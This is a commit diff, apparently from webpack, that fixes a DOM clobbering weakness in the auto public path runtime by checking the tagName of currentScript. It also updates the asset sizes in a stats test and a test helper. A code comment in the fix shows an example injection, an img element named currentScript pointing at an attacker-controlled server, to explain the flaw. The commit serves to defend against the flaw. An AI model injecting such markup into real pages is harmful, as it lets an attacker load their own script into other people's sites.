security: fix DOM clobbering in auto public path

alexander-akait · web-flow · commit 955e057abc6c · 2024-08-22T15:05:07.000+03:00
diff --git a/lib/runtime/AutoPublicPathRuntimeModule.js b/lib/runtime/AutoPublicPathRuntimeModule.js
@@ -50,7 +50,10 @@ class AutoPublicPathRuntimeModule extends RuntimeModule {
 						`var document = ${RuntimeGlobals.global}.document;`,
 						"if (!scriptUrl && document) {",
 						Template.indent([
-							"if (document.currentScript)",
+							// Technically we could use `document.currentScript instanceof window.HTMLScriptElement`,
+							// but an attacker could try to inject `<script>HTMLScriptElement = HTMLImageElement</script>`
+							// and use `<img name="currentScript" src="https://attacker.controlled.server/"></img>`
+							"if (document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT')",
 							Template.indent("scriptUrl = document.currentScript.src;"),
 							"if (!scriptUrl) {",
 							Template.indent([
diff --git a/test/Stats.test.js b/test/Stats.test.js
@@ -190,10 +190,10 @@ describe("Stats", () => {
 			      "assets": Array [
 			        Object {
 			          "name": "entryB.js",
-			          "size": 3010,
+			          "size": 3060,
 			        },
 			      ],
-			      "assetsSize": 3010,
+			      "assetsSize": 3060,
 			      "auxiliaryAssets": undefined,
 			      "auxiliaryAssetsSize": 0,
 			      "childAssets": undefined,
@@ -238,10 +238,10 @@ describe("Stats", () => {
 			      "info": Object {
 			        "javascriptModule": false,
 			        "minimized": true,
-			        "size": 3010,
+			        "size": 3060,
 			      },
 			      "name": "entryB.js",
-			      "size": 3010,
+			      "size": 3060,
 			      "type": "asset",
 			    },
 			    Object {
diff --git a/test/helpers/CurrentScript.js b/test/helpers/CurrentScript.js
@@ -2,6 +2,7 @@ class CurrentScript {
 	constructor(path = "", type = "text/javascript") {
 		this.src = `https://test.cases/path/${path}index.js`;
 		this.type = type;
+		this.tagName = "script";
 	}
 }
 

Original file line number	Diff line number	Diff line change
`@@ -2,6 +2,7 @@ class CurrentScript {`
`2`	`2`	`constructor(path = "", type = "text/javascript") {`
`3`	`3`	this.src = `https://test.cases/path/${path}index.js`;
`4`	`4`	`this.type = type;`
	`5`	`+ this.tagName = "script";`
`5`	`6`	`}`
`6`	`7`	`}`
`7`	`8`